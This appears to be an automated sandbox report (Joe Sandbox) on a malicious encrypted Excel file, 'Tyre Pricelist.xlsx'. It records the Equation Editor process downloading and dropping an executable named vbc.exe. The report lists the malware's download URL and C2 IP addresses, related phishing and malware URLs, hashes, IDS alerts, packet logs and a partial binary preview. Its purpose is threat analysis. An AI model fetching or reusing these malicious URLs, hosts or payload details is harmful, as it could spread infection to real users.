                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xlsx
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                TimeTypeDescription
                                                                                                                                                11:23:16API Interceptor97x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                11:23:20API Interceptor55x Sleep call for process: vbc.exe modified
                                                                                                                                                11:23:26API Interceptor32x Sleep call for process: RegAsm.exe modified
                                                                                                                                                11:23:43API Interceptor230x Sleep call for process: NETSTAT.EXE modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                103.125.191.52eD17GZuWs.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.5/bin_xMjelaYnr43.bin
                                                                                                                                                Unique food order.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.5/bin_xMjelaYnr43.bin

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                SEDO-ASDEnew file.exe.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.241.136
                                                                                                                                                Bonifico n.1101202910070714.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.241.136
                                                                                                                                                hRVrTsMv25.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.241.136
                                                                                                                                                v6k2UHU2xk.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.241.136
                                                                                                                                                http://walmartmoneycard.xyzGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.136
                                                                                                                                                http://ww1.0ffice.com/Get hashmaliciousBrowse
                                                                                                                                                • 91.195.240.14
                                                                                                                                                New Additional Agreement.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.94
                                                                                                                                                UBEH7JEUC0.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.241.136
                                                                                                                                                Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.94
                                                                                                                                                H4A2-423-EM152-010.TIF.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.13
                                                                                                                                                Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.94
                                                                                                                                                ORDER7098EAR.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.241.136
                                                                                                                                                mFNIsJZPe2.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.94
                                                                                                                                                http://walmartmoneycard.xyzGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.136
                                                                                                                                                Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.94
                                                                                                                                                AWB# 9284730932.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.94
                                                                                                                                                DEWA PROJECT 12100317.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.94
                                                                                                                                                http://tgreendot.comGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.136
                                                                                                                                                http://freeaccountnow.comGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.136
                                                                                                                                                http://krypton.rackage.co.ukGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.87
                                                                                                                                                VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN2eD17GZuWs.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.5
                                                                                                                                                Unique food order.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.5
                                                                                                                                                tt payment proof.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.187
                                                                                                                                                TIE-3735-2020.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.229
                                                                                                                                                payslip.s.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.187
                                                                                                                                                Telex-relase.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.141.138.120
                                                                                                                                                Y0L60XAhvo.rtfGet hashmaliciousBrowse
                                                                                                                                                • 103.141.138.122
                                                                                                                                                d6pj421rXA.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.139.45.59
                                                                                                                                                8YPssSkVtu.rtfGet hashmaliciousBrowse
                                                                                                                                                • 103.141.138.87
                                                                                                                                                PI098763556299.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.229
                                                                                                                                                PIT12425009.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.229
                                                                                                                                                wIeFid8p7Q.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.125.189.164
                                                                                                                                                Dell ordine-09362-9-11-2020.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.139.45.59
                                                                                                                                                shipping documents.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.133.108.6
                                                                                                                                                shipping documents.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.133.108.6
                                                                                                                                                EES RFQ 60-19__pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.114.107.156
                                                                                                                                                Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.141.138.122
                                                                                                                                                Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.141.138.122
                                                                                                                                                Z08LsyTAN6.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.125.189.164
                                                                                                                                                QUO_M.VECOQUEEN.xlsx.docxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.123
                                                                                                                                                BCPL-SGBGPNETGlobalASNSGABSyodh8yx.exeGet hashmaliciousBrowse
                                                                                                                                                • 143.92.57.83
                                                                                                                                                tr2rgxBVl1.exeGet hashmaliciousBrowse
                                                                                                                                                • 143.92.57.83
                                                                                                                                                5kVcSS3v3q.exeGet hashmaliciousBrowse
                                                                                                                                                • 143.92.57.83
                                                                                                                                                VfXZcSLj.exeGet hashmaliciousBrowse
                                                                                                                                                • 14.128.35.30
                                                                                                                                                ORDERCONFIRMATION_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                • 96.43.100.200
                                                                                                                                                Scan_PO238489923737483924.exeGet hashmaliciousBrowse
                                                                                                                                                • 180.215.112.164
                                                                                                                                                Remittance Scan DOC-2029293#PI207-048.exeGet hashmaliciousBrowse
                                                                                                                                                • 180.215.95.222
                                                                                                                                                PO8479349743085.exeGet hashmaliciousBrowse
                                                                                                                                                • 96.43.96.14
                                                                                                                                                PO#47974GH397.exeGet hashmaliciousBrowse
                                                                                                                                                • 96.43.96.14
                                                                                                                                                Maersk Kleven V949E.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 118.107.13.191
                                                                                                                                                YDrnUOyMmD.exeGet hashmaliciousBrowse
                                                                                                                                                • 118.107.13.191
                                                                                                                                                https://thehighestleveloftheworld.top/f862d13454fd267baa5fedfffb200567/signin.php?country=ZA-South%20Africa&lang=enGet hashmaliciousBrowse
                                                                                                                                                • 118.107.14.220
                                                                                                                                                https://www.amazon.co.jp.d13f0fed4d24d232f3c591.net/mobile/Get hashmaliciousBrowse
                                                                                                                                                • 118.107.14.158
                                                                                                                                                https://amazon.account-update.amazon.co.jp.s8u913f0fed42f3c6a45b3.net/mobile/Get hashmaliciousBrowse
                                                                                                                                                • 118.107.14.139
                                                                                                                                                http://down.idc3389.top/downloader.exeGet hashmaliciousBrowse
                                                                                                                                                • 116.193.154.122

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
                                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:downloaded
                                                                                                                                                Size (bytes):599552
                                                                                                                                                Entropy (8bit):7.855744157979213
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:K29Z0ZfOKYJqFwpzpYTnMS3hrrnplI5GJriD:f9WtZY7wTnT9npu5G0
                                                                                                                                                MD5:429BBA6DBE159C300679509BE3085665
                                                                                                                                                SHA1:F79F58BC3142B59D0D8669595A01770BDF5486FF
                                                                                                                                                SHA-256:04274B027D3BD09EC0D7B58FF5AF64AA06E626668995CB5EF6D7FAD939BC6C33
                                                                                                                                                SHA-512:450A46356FB78D3E37E64F0EDC8A4197E2E22E8C29E36499D1F08FD00F6B38999E4534AC5165CDFA59D68A179EDE64362EF5CF27DCCD2719DDB0FDA9A599345D
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 33%
                                                                                                                                                Reputation:low
                                                                                                                                                IE Cache URL:http://workfinethdysanotherrainbowlomoyentthghf.ydns.eu/worksdoc/svchost.exe
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._.............................=... ...@....@.. ..............................U.....@..................................=..O....@..B....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...B....@....... ..............@..@.reloc.......`.......$..............@..B.................=......H........................q...+..........................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r?..p.....*6..{b...(^...*..o.....{a...{c....{b...oZ...(^...*.so....p...*..oq...*V.{....od....(...+...*J.{....o1....ov...*J
                                                                                                                                                C:\Users\user\Desktop\~$Tyre Pricelist.xlsx
                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):330
                                                                                                                                                Entropy (8bit):1.4377382811115937
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                C:\Users\Public\vbc.exe
                                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):599552
                                                                                                                                                Entropy (8bit):7.855744157979213
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:K29Z0ZfOKYJqFwpzpYTnMS3hrrnplI5GJriD:f9WtZY7wTnT9npu5G0
                                                                                                                                                MD5:429BBA6DBE159C300679509BE3085665
                                                                                                                                                SHA1:F79F58BC3142B59D0D8669595A01770BDF5486FF
                                                                                                                                                SHA-256:04274B027D3BD09EC0D7B58FF5AF64AA06E626668995CB5EF6D7FAD939BC6C33
                                                                                                                                                SHA-512:450A46356FB78D3E37E64F0EDC8A4197E2E22E8C29E36499D1F08FD00F6B38999E4534AC5165CDFA59D68A179EDE64362EF5CF27DCCD2719DDB0FDA9A599345D
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 33%
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._.............................=... ...@....@.. ..............................U.....@..................................=..O....@..B....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...B....@....... ..............@..@.reloc.......`.......$..............@..B.................=......H........................q...+..........................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r?..p.....*6..{b...(^...*..o.....{a...{c....{b...oZ...(^...*.so....p...*..oq...*V.{....od....(...+...*J.{....o1....ov...*J

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:CDFV2 Encrypted
                                                                                                                                                Entropy (8bit):7.996727168383382
                                                                                                                                                TrID:
                                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                File name:Tyre Pricelist.xlsx
                                                                                                                                                File size:2481664
                                                                                                                                                MD5:3b5f7a2a0429e796040aa5bc3763a8fe
                                                                                                                                                SHA1:c049ac5a44d034995a55bd5f49aece9631c69c1f
                                                                                                                                                SHA256:9853da661450f9b9a4c06dc952bc70d7cdd8e80cf7e9f8189f2d15682bd88434
                                                                                                                                                SHA512:a345f1248ca41d2b88e05417c404ff3e57de909921b06a2543a79ef30ae62c1cfb5af2b5ba9ae13e2e500bb290951d3c356fe1b97990e32721b5093d6ea73766
                                                                                                                                                SSDEEP:49152:PYwpjAWZWQz/mAevYUEcg1udmyMc8gsD7iHqUg0hc:AwpsmswoVd3MCsD7iKAc
                                                                                                                                                File Content Preview:........................>...................&...........................................................................z.......|.......~...............z.......|.......~...............z.......|.......~...............z.......|..............................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OLE
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "Tyre Pricelist.xlsx"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:False
                                                                                                                                                Application Name:unknown
                                                                                                                                                Encrypted Document:True
                                                                                                                                                Contains Word Document Stream:False
                                                                                                                                                Contains Workbook/Book Stream:False
                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:False

                                                                                                                                                Streams

                                                                                                                                                Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                General
                                                                                                                                                Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:64
                                                                                                                                                Entropy:2.73637206947
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                General
                                                                                                                                                Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:112
                                                                                                                                                Entropy:2.7597816111
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                General
                                                                                                                                                Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:200
                                                                                                                                                Entropy:3.13335930328
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                General
                                                                                                                                                Stream Path:\x6DataSpaces/Version
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:76
                                                                                                                                                Entropy:2.79079600998
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                Stream Path: EncryptedPackage, File Type: PGP symmetric key encrypted data - Plaintext or unencrypted data, Stream Size: 2458264
                                                                                                                                                General
                                                                                                                                                Stream Path:EncryptedPackage
                                                                                                                                                File Type:PGP symmetric key encrypted data - Plaintext or unencrypted data
                                                                                                                                                Stream Size:2458264
                                                                                                                                                Entropy:7.99990874269
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . % . . . . . . . . . . . . . Q . . . . $ . 9 4 ' x . . . . W . D . g l . 5 M . F . . . . . > . . . . > . . M . . . k . W . . [ . . 9 . ? . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . .
                                                                                                                                                Data Raw:8c 82 25 00 00 00 00 00 b9 ec c5 18 bf 1c 1a c8 51 13 9d d1 05 24 bc 39 34 27 78 20 2e 15 0a aa 57 06 44 d5 67 6c dc 35 4d d2 46 ea ef a8 84 1e 3e 85 f1 fe 90 3e 81 8c 4d ac be e7 6b 8c 57 e8 d9 5b fd aa 39 f3 3f c9 e3 7c 65 83 b7 67 93 08 7a 06 54 e3 a1 c4 c5 ee e3 7c 65 83 b7 67 93 08 7a 06 54 e3 a1 c4 c5 ee e3 7c 65 83 b7 67 93 08 7a 06 54 e3 a1 c4 c5 ee e3 7c 65 83 b7 67 93 08
                                                                                                                                                Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                General
                                                                                                                                                Stream Path:EncryptionInfo
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:224
                                                                                                                                                Entropy:4.56052515619
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . f . ] . . . D . 7 . / & . X . l . . . E I ~ b . . . ! X . A . . . . t < . . . . . . x . . . A . l . . \\ . . @ . . . . . . . . x 6 .
                                                                                                                                                Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                Network Behavior

                                                                                                                                                Snort IDS Alerts

                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                11/20/20-11:23:46.787297TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916580192.168.2.22103.125.191.5

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Nov 20, 2020 11:23:46.567594051 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:46.786763906 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:46.786992073 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:46.787297010 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.007692099 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.007766008 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.007797956 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.007819891 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.007997990 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.008752108 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.226994991 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.227062941 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.227113008 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.227163076 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.227211952 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.227252007 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.227262020 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.227289915 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.227308989 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.227329016 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.227365017 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.227371931 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.227514982 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.445997953 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446053028 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446091890 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446130991 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446171045 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446212053 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446297884 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.446327925 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.446331978 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.446343899 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446388960 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446409941 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.446427107 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446475029 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446491003 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.446517944 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446538925 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.446557999 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446576118 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.446599960 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446603060 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.446691036 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446732044 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446768999 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.447190046 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.452023983 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.452661991 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.665560961 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.665719986 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.665776968 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.665783882 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.665817976 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.665822983 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.665832996 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.665863037 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.665872097 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.665910959 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.665945053 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.665947914 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.665977001 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.665980101 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666009903 CET4916580192.168.2.22103.125.191.5
